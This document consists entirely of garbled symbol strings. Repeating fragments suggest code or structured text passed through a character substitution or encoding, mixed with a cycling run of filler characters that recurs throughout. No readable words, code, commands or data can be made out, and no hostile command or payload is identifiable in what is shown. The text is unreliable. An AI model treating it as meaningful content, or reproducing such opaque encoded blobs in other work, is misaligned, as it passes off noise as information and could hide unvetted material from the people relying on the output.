!6;)%*=9>,(- <
!/+0#:$2,**=?4</?129?32<~129?32<z~~~~9)2=(:=9,dd*091929?3;/2<.3&='516D@E8
49GCH;7<JFK>U?MINAXBPLQ_[,**=?4</?129?32<~129?32<z~9)2=H*2)=89Zdd*091929?3;/2<`SOTb^cVRWeafYpZhdi\
s]kglzv{njo}y~qmr"|#t-u%!!&w0x($)73
8+',:*+52?129?32<z~u*+52?1929?32<r4</?::=zvdd++9,::=~*9+6;.*/=9>1
(2 <!4+5#?$2.3&"'516)%,**=?4</?::=~4</?::=z~~~~9)2=(:=9,dd++9,::=*849,C-;7</F0>:?M
INA=BPLQD@ESOTG^HVRWJ,**=?4</?::=~4</?::=z~9)2=H*2)=89Zdd++9,::=aKYUZhd
i\!X]kgl_
[`njobycqmre|ftpu%!!&wsx($)zv{+',}
6~.*/"9#1-2 <!405##~!JKUR?T\O~LJJ]?T\O#~4<O,:]9*=9,[?,:=?\N~;/,.?$73
8&"':1;)%*=4>,(-;7</+0>:?2,**=?4</~LJJ]?T\Oz~,=(.).3A
=B5L6D@E8O9GCHVR*+52?4</~JKUR?T\Oz~,=(.)WJFKYUZMIN\
X]PgQ_[`SjTb^cq*;94</?*+/.~2=</27m
reaftpuhdiwsxk$lzv{n'o}A++9,::=~'90C~*;94</~*9+
y~.*/"|#1-2%!*;94</z~*+52?4</~:09..=2&405(?)7
38+",:6;)%*=#~!~|9;0/|~aa~Aulv,**=?4</z~,9'/2/*~705,*+C~#~859>,(- <!/+0#:$2.3&='516D@
E849GCH;7<JFK>U?MINA|88/|~ulv,**=?4</~*9+XBPLQ_[`SOTb^cVRWeafYpZh
di\s]kglzv!{njo}
y~qmr"|#t,**=?4</~*;94</z~9)2=(*9+dd++9,::=-u%!&w0x($)738+',:6;.*
/=9>1(2 <!4+5#?$2,**=?4</~*;94</z~9)2=H*2)=89Zdd++9,::=.3&"'516)%*849,C-;7</
F0>:?MIumv,**=?4</z~4</?*18~*9+NA
=BPLQD*;94</~4</?*18z~*+5R++9,::]/J::]dd*=1,/8@ESOTG^HVRWJaKYUZhd
i\X]kgl_[`njob*;94</~4</?*18z~*+5R++9,::]/J::]dd*=1,/8ycqmre|ftpu%!&wsx(
$)zv*;94</z~,**]-9+Q*9K?,:=?\N{+',}6~.*/"9#1-2 <!405#?$7
38&!"':1;)%*=4>,(-;7
</+0>:?2.3A#~!~4</?,::=~#~,**]-9+Q*9K?,:=?\N~;/,.=B5L6D@E8O9GCHV
R*;94</?*+/.~2=</27WJFKYUZMIN\X]PgQ_[`SjTb
u91=0?::=r4</?,::=zvdd++9,::=z~91=0?,::=~*9+^cqmreaftpuhd
iwsxk$lzu1=,=.?:,/'?-+1r*;94</?*+/.zvdd*+/Nz~1=,=.?:,/'?-9+1~*9+~%=,,=v{n'o}y~.*/"
|#1-2%!&405(?)738+",:6;)%B~!Au91=0?,::=zv1=,=.?:,/'?-9+1~+*+5&9~/805C#~85*=9>,(- <!/+0#:$2.3&
='516D@E849GCH;7<JFK>U?M#INAXBPLQ_[
`SOTbu91=0?,::=zv1=,=.?:,/'?-9+1z~1=,=.?-9+1?,::=~*9+^cVRWeafY
pZhdi\s]kglzv{njo}y~qmAn~1=,=.?-9+1?,::=z~&9:052C~unv,**=?-9+1~*9+r"|#t-u%!&w0x($)7
38+',:6;.*/=9>1(2 <!4Am~1=,=.?-9+1?,::=z~&9:052C~umv,**=?-9+1~*9++5#?$2.
3&Al~1=,=.?-9+1?,::=z~&9:052C~ulv,**=?-9+1~*9+"'516)
%*849,C-;7</F0>:?MIA91=0?,::=z~u91=0?::=?-+1r*;94</?*+/.zvdd*+/Nz~6;,=9+2C~/0?-9+~*9+NA=BPLQD@ESOTG
^HVRWJaKYUZhdi\X]k/0?-9+z~ukv,**=?-9+1~*9+gl_[
`njobycqmre|ftpu%!&wsx($)zAk~1=,=.?-9+1?,::=z~&9:052C~ujv,**=?-9+1~*9+v{+
',}6~.*/"9#1-2 <B~!n~aa~A|P|~91=0?,::=z~9,=.1/;~705,*+C#~859+29~!!405#?$738&
"':1;)%*=4>,(-;#7
</+0>:?2.3A=B5L6D@E8O9G||~unv,**=?-9+1~*9+
CHVRWJFKYUZMIn~umv,**=?-9+1~*9+N\X]PgQ_
[`SjTb^cqmre|,9<1)P~9;09)-9K|~ulv,**=?-9+1~*9+aftpuhdiwsxk$lzv{n'o}y~.*
/"|#1-2%!&405(?)738+Au91=0?::=?-+1r*;94</?*+/.zvdd*+/Nz~6*70922C~/0?-9+~*9+",:6;)%*=9>,(- <!/+0#:$2
.3&='516D@/0?-9+z~ukv,**=?-9+1~*9+E849G
CH;7<JFK>n~ujv,**=?-9+1~*9+U?MINAXBPLQ_[`SOTb^cVR
WeafYpZhdi\s]kglzB~9+29~!v{njo}y~qmr"|#t-u%!&w
0x($)73#8+
',:6;.||~unv,**=?-9+1~*9+*/=9>1(2 <!4+5#?$2.
3&"'516)%*849,n~umv,**=?-9+1~*9+C-;7</F0>:?MINA=BP
LQD@||~ulv,**=?-9+1~*9+ESOTG^HVRWJaKYUZhdi\X]kgl_
[`nAu91=0?::=?-+1r*;94</?*+/.zvdd*+/Nz~6*70922C~/0?-9+~*9+jobycqmre|ftpu%!
&wsx($)zv{+/0?-9+z~ukv,**=?-9+1~*9+',}6~.*/"9#1-2 
<m~ujv,**=?-9+1~*9+!405#?$738&"':1;)%*=4>,
!(-;7</+0>:?2.
3A=B5L6D,**=?-9+1~4</?,::=z~,**]-9+Q*9Kdd++9,::=@E8O9GCHVRWJ
FKYUZMIN\X]PgQ_[`SjTb^cqm,**=?-9+1~4</?,::=z~,**]-9+Q*2)=89Zdd++9,::=reaftpuhdiwsxk$lzv{n
'o}y~.*/"|#1-2%!&405(?)7!38+",:6;)%
*=9>,#~!JKUR?YQ]P?ZZ]~JKUR?T\O?ZZ]~#~*+5R91=P++9,::]*9W?,:=?\N~;/,.(- <!/+0#
:$2.3&='516D@E849GCH;7*+52?4</?::=~JKUR?T\O?ZZ]z~,=(.)<JFK>U?MINAXBPLQ_
[`SOTb^cVRWeafYpZhdi\*+52?91=0?::=~JKUR?YQ]P?ZZ]z~,=(.)s]kglzv
{nB~*+52?4</?::=z~4</?::=~6;=9,/8jo}y~q
mr"|#t-u%!&w0x($)73#8+',:6;.*/=9>1
(2 <!4+5#?$2.3&"'5u91=0?::=r4</?::=zvdd++9,::=z~*+52?91=0?::=~:09..=216)%
*849,C-;7</F0>:?MINA=BPLQD!@ES
OTG^HVRWJaKYUZhdB~!A*+52?91=0?::=~+*+5&9~/805C}#~85i\X]kgl_[`n
jobycqmre|ftpu%#!
&wsx($)zv{+',}6~.*/"9#1||~*+52?91=0?::=~*9+
-2 <!405#?$73!8&"':1;)
%*=4>,(-;7</!+0>:?2.3A=B5L6D@E8O9GCHVR
WJFKYUZMIN\X]PgQ_[`S#~!~JKUR?T\O?ZZ]~#~+9++9,::]*,/K?,:=?\N~;/,.jTb^cqmreaftpuhdiwsxk$lz
v{n'o}y~.**+52?4</?::=~JKUR?T\O?ZZ]z~,=(.)/"|#1
-2%!&405(A*+52?4</?::=z~6*70922C~+*091929?/0~*9+?)738+",:6;)%*=9>,(- <
!/+0#:$2.3&='516DB~!55~,;05#~!Am~q~+*091929?/0z~,.&9C~b~55z#~!n~55~*9+#~,/8@E849GCH;7<JFK>U?MINA
XBPLQ_[#`S
OTb^cVB~!44~,;05#~!+*091929?/0z~b~44z#~!Am~s~55z~,.&9C~44~*9+#~,/8RWeafYpZhdi\s]kglzv
{njo}y~qmr"|#t#-u%!&w0x($)738+',:
6;.*A55z~*+52?4</?::=z~&9:052C~4</?55?,::=~*9+/=9>1(2 <!4+5#?$2.3&"'516)
%*8u/0?-9+r4</?55?,::=zvdd++9,::=z~&:05?55?,::=~*9+49,C-;7</F0>:?MI
NA=BPLQD@ESA44z~*+52?4</?::=z~&9:052C~4</?44?,::=~*9+OTG^HVRWJaKYUZh
du/0?-9+r4</?44?,::=zvdd++9,::=z~&:05?44?,::=~*9+i\X]kgl_[`njobycqmre|ft
B~!&:05?55?,::=z~b~&:05?44?,::=z#~85pu%!&wsx($)zv
{+',}6~.#*/"9#1-2 <!4
05#?$738&"':1;)%*=4>,(-;7A4</?44?,::=z~55z~55z~*+52?4</?::=z~9;=2.9,2C~*+52?4</?::=~*9+</+0>:?2.3A=B5L6D@E8
O9GCHVRWJFKYUZMIN\X]PgQ_A4</?55?,::=z~44z~44z~*+52?4</?::=z~9;=2.9,2C~*+52?4</?::=~*9+[`SjTb^cqm
reaft!puhdiwsxk
$lzv{n'o}y~.*/"|#1-2%!!&405(?)738+",:6;)
%*=9>,(- <!/+0#:$2.3&!='516D@
E8!49GCH;
7<JFK>U?MINAXBPLQ_[#~!~*+52?4</?,::=~#~*+5R4<O++9,::]*9K?,:=?\N~;/,.`SOTb^cVRWeafY
pZhdi\s]kglzv{njo}*;94</?*+/.~2=</27y~qm
r"|#t-u%!&w0x($)738+',:6;.*+52?4</?,::=z~u*+52?4</?::=r*;94</?*+/.zvdd*+/N~*9+*/=
9>1(2 <!4+5#?$2.!3&"'516)%*8
49,C-;7</F0>:?M#~!~JKUR?T\O?LZZ]~#~*+5R4<O++9,::]*9L?,:=?\N~;/,.I
NA=BPLQD@ESOTG^HVRWJaKY*+52?4</?,::=~JKUR?T\O?LZZ]z~,=(.)
UZhdi\X]kgl_[*;94</?*+/.~2=</27`njobycq
mre|ftpu%!&wu*+52?4</?::=r*;94</?*+/.zvdd*+/Nz~*+52?4</?,::=~*9+sx($)zv{+',}6~.*/"9#1-2 <
!405#?$738&"':1;)%*=!4>,(-;7</+0>:?2.3A=B5L6D
@E8O9GCHVR#~!#~-9+Q6*5G*+5R4<O,::];0%K?,:=?\N~;/,.WJFKY
UZMIN\X]P*+52?4</?::=~*+5R4<O++9,::]*9L?,:=?\NgQ_[`SjTb^cqmreaftpuhd
iwsxk$lzv{n'o}y~.B~*+52?4</?::=z~4</?::=~6;=9,/8*/"|#1-2%!&405(?)738+
",:6;)%#*=
9>,(- u/0?-9+r4</?::=zvdd++9,::=z~/0?-9+~*9+<!/+0#:$2.3&='516D@
E849GCH;7<JFK>B~!~|P|~aa~u91=0?::=r4</?::=zvdd++9,::=z~#~85U?MINAXBPLQ_[`SOTb
^cVR#WeafYpZhdi\s]kglzv{njo}y~q
mr"4</?::=z~4</?0::=~*9+|#t-u%!&w0x($)73
8+',:6;.*/=B~!~|*&9J|~aa~u91=0?::=r4</?::=zvdd++9,::=z~#~859+29~!9>1(2 <!4+5#?$2
.#3&"'516)%*849,C-;7</F0>
4</?::=z~4</?*::=~*9+:?MINA=BPLQD@
ESOTG^HVB~9+29~!RWJaKYUZhdi\
X]kgl_[`njobycqmre|ftpu%!#&wsx($)zv{+',}6~.*/"
9#1-2 <!405#?$738&"':1;)4</?::=z~u/0?-9+zv,,=?,::=~*9+%*=4>,(-;7
</+0>!:?2.3A=B5
L6D@E8O9GCHVRWJFKYUZMI!N\X]PgQ_[`SjTb^cq
mreaftpuhdiwsxk$lzv{nA*+52?4</?::=z~6*70922C~0~*9+'o}y~.*
/"B~!5~,;05#~!Al~q~0z~,.&9C~b~5z#~!n~5~*9+#~,/8|#1-2%
!&405(?)738+",:6;)%#*=9>,(- <!/+0#
:$2.3&='516D@E849GB~Au5zv,,=?,::=~+*+5&9~/805C~85CH;7
<JFK>U?MINAXBPLQ_[`SOTb^cV#RWe
afYpZhdi\s]kglzvu5zv,,=?,::=z~*+52?4</?::=?'90~:09..=2{njo}y~qmr"
|#t-u%!&w0x($)7!3
8+',:6;.*/=9>1(2 <!4+5#!
?$2.3&"'516)%4</?0::=z~*+52?4</?::=?'90~:09..=2*849,C-;
7</F0>:?MINA4</?*::=z~*+52?4</?::=?'90~:09..=2=BPLQD@ESOTG^HVRWJaKYUZhd
i\X]kgl_[`njobycqmre*+52?4</?::=?'90z~*+5R4<O++9,::]*9K?,:=?\N|ftpu%!&wsx($)zv{+',}6~.
*/"9#1-2 <!!405#
?$738&"':#~!~JKUR?YQ]P?LZZ]~JKUR?T\O?LZZ]~#~*+5R91=P++9,::]*9L?,:=?\N~;/,.1;)%*=4>,(-;7</+0>:?2.
3A=B5L6D@E8O9GCHV*+52?4</?,::=~JKUR?T\O?LZZ]z~,=(.)RWJFKYUZMIN\X]PgQ_[`S
jTb^cqm*+52?91=0?,::=~JKUR?YQ]P?LZZ]z~,=(.)re
aftpuh||~*+52?91=0?,::=~*9+diwsxk$lzv{n'o}y~.*
/"|#1-2%!&405(B~*+52?4</?,::=z~4</?::=~6;=9,/8?)738+",:6;)%*=9>,
(- <#!/+0#:$2.3&='516D@E849GCH;
7<Ju91=0?::=r4</?::=zvdd++9,::=z~*+52?91=0?,::=~:09..=2FK>U?MINAXBPLQ_[
`SOTb^cVRWe!afYpZhdi\s]kglz
v!{njo}y~qmr"|#t-u%!&w0x(
#~!T\O?LZZ]~LJJ]?T\O~JKUR?T\OX~JKUR?T\O#~4<O,:]%2..]?,:=?\N~;/,.$)738+',:6;.*
/=9>1(2 *+52?4</~JKUR?T\Oz~,=(.)<!4+5#?$2.3&
"'516)%*849,C-;7</F0>:?MI*+52?4</8~JKUR?T\OXz~,=(.)NA=BPLQD@ESOTG^HVRWJ
aKYUZhdi\X]kgl_[`njobycq,**=?4</~LJJ]?T\Oz~,=(.)mre|ftpu%!
&wsx(4</?,::=~T\O?LZZ]z~,=(.)$)zv{+',}
6~.*/"9#1-2 <!405#?$739:/;?*9,~*+52?4</8~umv,**=?4</~91=P1,X4<O*9L?1/;?\N8&"':1;)%*=4>,(-;
7</+0>:?2.3A=B5L6D@E89:/;?*9,z~umv,**=?4</~*9+O9GCHVR
WJ,**=?4</?+9,.~4</?,::=z~9)2=(:=9,dd++9,::=FKYUZM
IN\X]PgQ_[`SjTb^cqm,**=?4</~4</?,::=z~9)2=(*9+dd++9,::=reaftpuhdiwsxk
$lzv{n'o}y~.*/"|#1B~!umv,**=?4</?+9,.z~a}~umv,**=?4</z#~85-2%!
&405(?)738+",:6;)%*=9>,(- #<!/
+0#:$2.3&='516D@4</?,::=~umv,**=?4</?+9,.z~*+5R++9,::]1/,X9*929Zdd*=1,/8E849GCH;7<J
FK>U?MINAXBPLQ_4</?,::=~umv,**=?4</z~*+5R++9,::]/J::]dd*=1,/8[
`SOTb^cVRWeafYpZhdi\s]k!
glzv{njo}y~qm!r"|#t-u%
!&w0x($)738+#~!FYZPU?T\O~LJJ]?T\O~JKUR?T\O#~,**]4<O,:]89Z?,:=?\N~;/,.',:6;.*/=9>1(2 <!4+5#?$2.
3&"'516)%*849,C-;7</*+52?4</~JKUR?T\Oz~,=(.)F0>:?MINA=BPLQD@ESOTG^HV
RWJaKYUZhd,**=?4</~LJJ]?T\Oz~,=(.)i\X]k
gl_[`njob&9:05?4</~~~FYZPU?T\Oz~,=(.)ycqmre|ftpu%!&wsx($)zv
{+',}6~.*/"9#1-2 A&9:05?4</z~*+52?4</z~&9:052C~*;94</~*9+<!405#?$738&"':1;)%*=
4>,(-;7u9)2=(?89:r*;94</zvdd++9,::=z~9)2=(?*2)=89:~*9+</
+0>:?29)2=(?*2)=89:z~,**=?4</~*9+~%=,,=.3A=B5L6D@E8O9GCHVR
WJFKYUZMIN\X]Pu91=0?,/8rumv,**=?4</zvdd*=1,/8z~umv,**=?4</~*9+gQ_[`SjTb^cqmreaft
puhd!iwsxk$lzv{n'o}y~.*/"|#1-2%
!&4#~!~YIR]H?ZZ]~LJJ]?T\O~#~,**]::]1,X::]*9L?,:=?\N~;/,.05(?)738+",:6;)%
*=9>,(- <!/,**=?4</~LJJ]?T\Oz~,=(.)+0#:$2.3&='516D
@9)2=(?::=~YIR]H?ZZ]z~,=(.)E849GCH;7<JFK>U?MINAXBP
B~!44~,;05#~!km~b~44z#~!m~44~*9+#~,/8LQ_[`SOTb^cVR
WeafYpZh#di\s]kglzv{n
jo}y~qmr"|#t-u%!&w0x($)73B44z~6;*5'+8+',:6;.*/=9>1(2 <!4
+5#?$2.3&"'516)%*849,C-;#7</F0>:?MI
NA=BP#~~mLQD@ESOTG
^HVRWJaKYUZhdi\X]kgl_[B~!||~a}~u44zv,**=?4</z#~85`njobycqmre|ftpu%
!&wsx($)zv{+',}6~.*/"#9#1-2 <
!4u91=0?,/8ru44zv,**=?4</zvdd*=1,/8z~91=0?,/8~*9+05#?$7
38&"':1;)%*=4>,(-;7|91=0?,/8z~~~~~~J]QLOX|~9)2=(?::=~:09..=2</+0>:?2.3A=B5
L6D@E8O9GCHVRWJFKY!UZMI
N\X]PgQ_[`SjTb^cqmreaftpuh!diw
sxk$lzv{n'o}y~.*#~~l/"|#1-2%!&4
05(?)738+",:6;)B~!||~a}~u44zv,**=?4</z#~85%
*=9>,(- <!/+0#:$2.3&='5#
16D@E849GCH;7|u44zv,**=?4</z~~~~~~~Y[LOX|~9)2=(?::=~:09..=2<JFK>U?M
INAXBPLQ_[`S!OTb^cVRWeafYpZhdi\s]kglzv
{njo}y~qmr"|#t-u%!&w!0x($)738+',:6;.*/=9>1(2 
<!4+5#?$2.#~~j3&"'5
16)%*849,B~!||~a}~u44zv,**=?4</z#~85C-;7</F0>:?MINA=BPLQD@
ESOTG^HVRWJaKYUZh#di\X]kgl_[`njobycqmre
|ftpu%!|uiv,**=?4</z~u44zv,**=?4</z~~~~~~~~~F]Q|~9)2=(?::=~:09..=2&w
sx($)z!v{+',}6~.*/"9#1-2 <
!405#?$738&"':!1;)%*=4>,(-;7</+0>
:?2.#~~h3A=B5L6D@E8O9GCHVRWJFKYUZM
IN\B~!||~a}~u44zv,**=?4</z#~85X]PgQ_[`SjTb^cqm
reaftpuhdiw#sxk$lzv{n'o}y~.
*|ugv,**=?4</z~u44zv,**=?4</z~~~~~~~~~PUQ|~9)2=(?::=~:09..=2/"|#1-2%!&405(?)738+",:
!6;)%*=9>,(- <
!/+0#:$2!.3&='516D@E8
49GCH;7<JFK>U?MINAXBPLQ_[#~~f`SOTb^cVRWeafYpZhdi\
s]kglzv{njo}y~qmr"|#t-u%B~!Au44zv,**=?4</z~unv,**=?4</z~9,=.1/;~705,*+C#~85!&w0x($)73
8+',:#6;.*/=9>1
(2 <!4+5#?$2.3&"'516)%B~!~mq~aa~Au44zv,**=?4</z~zB~*+,58~705,*+C~#~85*849,C-;7</F0>:?M
INA=BPLQD@ESOTG^HVRWJ#aKYUZhd
i\||Bu44zv,**=?4</z|B~~~~~~LYZ]YR|~9)2=(?::=~:09..=2X]kgl_
[`njobycqmre|ftpu%!B~9+29~!&wsx($)zv{+',}
6~.*/"9#1-2 <!405##?$73
8&"':1;)%*=4>,(-;7</+0>:?2|ABu44zv,**=?4</zCB~~~~~~LYZ]YR|~9)2=(?::=~:09..=2.3A
=B5L6D@E8O9GCHVR!WJFKYUZMIN\
X]PgQ_[`SjTb^cq!m
reaftpuhdiwsxk$lzv{n'o}!
y~.*/"|#1-2%!#~~e&405(?)7
38+",:6;)%*=B~!||~a}~u44zv,**=?4</z#~859>,(- <!/+0#:$2.3&='516D@
E849GCH;7<JFK>U?MINA#XBPLQ_[`SOTb^cVRWeafYpZh
di\s]kglzvB~!~mq~aa~Au44zv,**=?4</z~zB~*+,58~705,*+C~#~85{njo}
y~qmr"|#t#-u%!&w0x($)738+',:6;.*
/=9>1(2 <!4+5#?$2||Bu44zv,**=?4</z|B~~~~~LYRU]LJ|~9)2=(?::=~:09..=2.3&"'516)%*849,C-;7</
F0>:?MIB~9+29~!NA
=BPLQD#@ESOTG^HVRWJaKYUZhd
i\X]kgl_[`njob|ABu44zv,**=?4</zCB~~~~~LYRU]LJ|~9)2=(?::=~:09..=2ycqmre|ftpu%!&wsx(
$)zv!{+',}6~.*/"9#1-2 <!405#?$7
38&!"':1;)%*=4>,(-;7
</+0>:?2.3A!=B5L6D@E8O9GCHV
R#~lmWJFKYUZMIN\X]PgQ_[`SjTb
91=0?*18?/,9$~,**=?4</~91=P*1X/,9D*9W?,:=?\N^cqmreaftpuhd
iwsxk$lzB~!||~a}~91=0?*18?/,9$z#~85v{n'o}y~.*/"
|#1-2%!&405(?)738+",:6;)%#*=9>,(- <!/+0#:$2.3&
='516D@E849GCH;7<JFK>U?M|91=0?*18?/,9$z~J]QLOX?OLYD|~9)2=(?::=~:09..=2INAXBPLQ_[
`SOTb!^cVRWeafY
pZhdi\s]kglzv{njo}y~qm!r"|#t-u%!&w0x($)7
38+',:6;.*/=9>1(2 <!4!+5#?$2.
3&!"'516)
%*849,C-;7</F0>:?MI!NA=BPLQD@ESOTG
^HVRWJaKYUZhdi\X]k#~!~YQ]P?JQX?OLYD~LJJ]?T\O?LZZ]~#~91=P*1X/,9D*9W?,:=?\N~;/,.gl_[
`njobycqmre|ftpu%!&wsx($)z,**=?4</?,::=~LJJ]?T\O?LZZ]z~,=(.)v{+
',}6~.*/"9#1-2 <91=0?*18?/,9$~YQ]P?JQX?OLYDz~,=(.)!405#?$738&
"':1;)%*=4>,(-;||~91=0?*18?/,9$~*9+7
</+0>:?2.3A=B5L6D@E8O9GB~!~||~a}~ulmv,**=?4</?,::=z~#~85
CHVRWJFKYUZMI#N\X]PgQ_
[`SjTb^cqmre#~n~85aftpuhdiwsxk$lzv{n'o}y~.*
/"|#1-2%!&405(?)738+*;94</?*+/.~2=</27",:6;)%*=9>,(- <!/+0#:$2
.3&='516D@*+52?4</?*18~*=1,/8~*;94</?*+/.z~*+5R4<O*9Wdd*+/NE849G
CH;7<JFK>9:/;?*9,~*+52?4</?*18~ulmv,**=?4</?,::=~91=P1,X4<O*9L?1/;?\NU?MINAXBPLQ_[`SOTb^cVR
WeafYpZhdi\s]kglz#~!~n~`~9:/;?*9,z~#~85v{njo}y~qmr"|#t-u%!&w
0x($)73u91=0?,/8r9:/;?*9,zvdd*=1,/8z~91=0?*18?/,9$~*9+8+
',:6;.!*/=9>1(2 <!4+5#?$2.
3&"'516)%*849,!C-;7</F0>:?MINA=BP
LQD@#~Au91=0?,/8rulmv,**=?4</?,::=zvdd*=1,/8~+*+5&9~/805C~85ESOTG^HVRWJaKYUZhdi\X]kgl_
[`nu91=0?,/8rulmv,**=?4</?,::=zvdd*=1,/8z~91=0?*18?/,9$~*9+jobycqmre|ftpu%!
&wsx($)zv{+91=0?*18?/,9$z~ukmv,**=?4</?,::=~*9+',}6~.*/"9#1-2 
<#~9+29~!!405#?$738&"':1;)%*=4>,
ukmv,**=?4</?,::=z~91=0?*18?/,9$~*9+(-;7</+0>:?2.
3A=B5L6D!@E8O9GCHVRWJ
FKYUZMIN\X]PgQ_[`SjTb^cqm!reaftpuhdiwsxk$lzv{n
'o}y~.*/"|#1-2%!&405(?)7!38+",:6;)%
*=9>,#~!~LJJ]?T\O?LZZ]~#~*1X/,9D*9K?,:=?\N~;/,.(- <!/+0#
:$2.3&='516D@E849GCH;7,**=?4</?,::=~LJJ]?T\O?LZZ]z~,=(.)<JFK>U?MINAXBPLQ_
[`SOTb^cVRWeafYpZhdi\umv,**=?4</?,::=z~4</?*18?,::=~*9+s]kglzv
{n,**=?4</?*18~4</?*18?,::=z~9)2=(:=9,dd*=1,/8jo}y~q
mr"|#t-u%!&w0x($)73B~!~|2=,91)P|~aa~umv,**=?4</?*18z~#~858+',:6;.*/=9>1
(2 <!4+5#?$2.3&"'5#16)%
*849,C-;7</F0>:?MINA=BPLQD*;94</?*+/.~2=</27@ES
OTG^HVRWJaKYUZhdu*+52?,=(?+%+?1/1r*;94</?*+/.zvdd*+/Nz~,,=?+%+?1/1~*9+~%=,,=i\X]kgl_[`n
jobycqmre|ftpu%||~*18?/,9$~*9+!
&wsx($)zv{+',}6~.*/"9#1B~!~uhv,**=?4</?*18z~#~85
-2 <!405#?$73#8&"':1;)
%*=4>,(-;7</B~!~n~aa~ujv,**=?4</?*18z~~xx~~n~aa~ukv,**=?4</?*18z~#~85+0>:?2.3A=B5L6D@E8O9GCHVR
WJFKYUZMIN\X]PgQ_[`S#jTb^cqmreaftpuhdiwsxk$lz
v{n'o}y~.*u*18?2=9,?/,9$zBv,,=?+%+?1/1z~*18?/,9$~*9+/"|#1
-2%!&405(!?)738+",:6;)%*=9>,(- <
!/+0#:$2.3&='516DB~!~n~aa~ukv,**=?4</?*18z~#~859+29~!@E849GCH;7<JFK>U?MINA
XBPLQ_[#`S
OTb^cVu*18?*05?/,9$zBv,,=?+%+?1/1z~*18?/,9$~*9+RWeafYpZhdi\s]kglzv
{njo}y~qmr"|#t!-u%!&w0x($)738+',:
6;.*mq~4</?*18?/,9$~*9+/=9>1(2 <!4+5#?$2.3&"'516)
%*8B~!~||~a}~*18?/,9$z~#~8549,C-;7</F0>:?MI
NA=BPLQD@ES#OTG^HVRWJaKYUZh
d*+52?4</?*18~*=1,/8~*;94</?*+/.z~*+5R4<O*9Wdd*+/Ni\X]kgl_[`njobycqmre|ft
4</?*18?/,9$~*+52?4</?*18~*18?/,9$~91=P1,X4<O*9L?1/;?\Npu%!&wsx($)zv
{+',}6~.!*/"9#1-2 <!4
05#?$738&"':1;)%*=4>,(-;74</?*18?/,9$z~ulmv,**=?4</?,::=~*9+</+0>:?2.3A=B5L6D@E8
O9GCHVRWJFKYUZMIN\X]PgQ_*18?/,9$z~ukmv,**=?4</?,::=~*9+[`SjTb^cqm
reaft!puhdiwsxk
$lzv{n'o}y~.*/"|#1-2%!!&405(?)738+",:6;)
%*=9>,(- <!/+0#:$2.3&#~!FYZPU?T\O~LJJ]?T\O~JKUR?T\O~#~4<O,:]'9P9*=9,[?,:=?\N~;/,.='516D@
E8*+52?4</~JKUR?T\Oz~,=(.)49GCH;
7<JFK>U?MINAXBPLQ_[,**=?4</~LJJ]?T\Oz~,=(.)`SOTb^cVRWeafY
pZhdi\s]kglzv{njo}&9:05?4</~FYZPU?T\Oz~,=(.)y~qm
r"|#t-u%!&w0x($)738+',:6;.*+52?4</~,**=?4</~4<O,:]9*=9,[?,:=?\N*/=
9>1(2 <!4+5#?$2.B!||~aa~&9:05?4</z#~853&"'516)%*8
49,C-;7</F0>:?M#I
NA=BPLQD@ESOTG^HVRWJaKYn~&9:05?4</~*9+
UZhdi\X]kgl_[B9+29~!`njobycq
mre|ftpu%!&w#sx($)zv{+',}6~.*/"9#1-2 <
!405#?$738&"':1;)%*=&9:05?4</~,;054>,(-;7</+0>:?2.3A=B5L6D
@E8O9GCHVR!WJFKY
UZMIN\X]PA*+52?4</z~6*70922C~6*7092~*9+gQ_[`SjTb^cqmreaftpuhd
iwsxk$lzv{n'o}y~.AAmq~6*7092z~,.&9C~*+52?4</z~&9:052C~4<O,,=9L~*9+*/"|#1-2%!&405(?)738+
",:6;)%AAmq~6*7092z~,.&9C~Am~q~6*7092z~,.&9C~*+52?4</z~9;=2.9,2C~*+52?4</~*9+*=
9>,(- A4<O,,=9Lz~&9:05?4</z~*+52?4</z~*,9+052C~*+52?4</~*9+<!/+0#:$2.3&='516D@
E849GCH;7<JFK>|,=(?::=?:+)?1/1zB|~unv,**=?-9+1~*9+U?MINAXBPLQ_[`SOTb
^cVRn~umv,**=?-9+1~*9+WeafYpZhdi\s]kglzv{njo}y~q
mr"\N7~2=</27|#t-u%!&w0x($)73
8+',:6;.*/=|u29<=Rr;+9:?:,/'r'90r3;/2<v\N7z|~ulv,**=?-9+1~*9+9>1(2 <!4+5#?$2
.&9:05?4</z~ukv,**=?-9+1~*9+3&"'516)%*849,C-;7</F0>
m~ujv,**=?-9+1~*9+:?MINA=BPLQD@
ESOTG^HV,**=?-9+1~4<O,,=9Lz~,**]-9+Q*9Kdd++9,::=RWJaKYUZhdi\
X]kgl_[`njobycqmre|ftpu%!,**=?-9+1~4<O,,=9Lz~,**]-9+Q*2)=89Zdd++9,::=&wsx($)zv{+',}6~.*/"
9#1-2 <!405#?$738&"':1;)B~!~6*7092z~b~*0)/;z~#~!~Am~s~&9:05?4</z~,.&9C~*0)/;~*9+~#~,/8%*=4>,(-;7
</+0>B~!~*0)/;~,;05~#:?2.3A=B5
L6D@E8O9GCHVRWJFKYUZMI#N\X]PgQ_[`SjTb^cq
mreaftpuhdiwsxk$lzv{nA*0)/;z~*+52?4</z~&9:052C~4</?::=~*9+'o}y~.*
/"*0)/;z~u/0?-9+r4</?::=zvdd++9,::=~*9+|#1-2%
!&405(?)738+",:6;)%!*=9>,(- <!/+0#
:$2.3&='516D@E849G!CH;7
<JFK>U?MINAXBPLQ_[`SOTb^cVB~LJJ]?MYKQ?ZZ]~LJJ]?T\O?XXI\~JKUR?T\O?ZZ]~#~4<O88)\,:]9*+=N?,:=?\N~;/,.RWe
afYpZhdi\s]kglzv#~!~FYZPU?T\O{njo}y~qmr"
|#t-u%!&w0x($)7*+52?4</?::=~JKUR?T\O?ZZ]z~,=(.)3
8+',:6;.*/=9>1(2 <!4+5#,**=?4</?88)<~LJJ]?T\O?XXI\z~,=(.)
?$2.3&"'516)%,**=?-9+1?::=~LJJ]?MYKQ?ZZ]z~,=(.)*849,C-;
7</F0>:?MINA&9:05?4</~FYZPU?T\Oz~,=(.)=BPLQD@ESOTG^HVRWJaKYUZhd
i\X]kgl_[`njobycqmre*;94</?*+/.~2=</27|ftpu%!&wsx($)zv{+',}6~.
*/"9#1-2 <u*+52?4</?*18r*;94</?*+/.zvdd*+/Nz~*+52?4</?*18~*9+!405#
?$738&"':9:/;?*9,~*+52?4</?*18~umv,**=?4</?88)<~91=P1,X4<O*9L?1/;?\N1;)%*=4>,(-;7</+0>:?2.
3A=B5L6D@E8O9GCHV9:/;?*9,z~umv,**=?4</?88)<~*9+RWJFKYUZMIN\X]PgQ_[`S
jTb^cqm*+52?4</?::=~,**=?4</?88)<~4<O,:]9*=9,[?,:=?\Nre
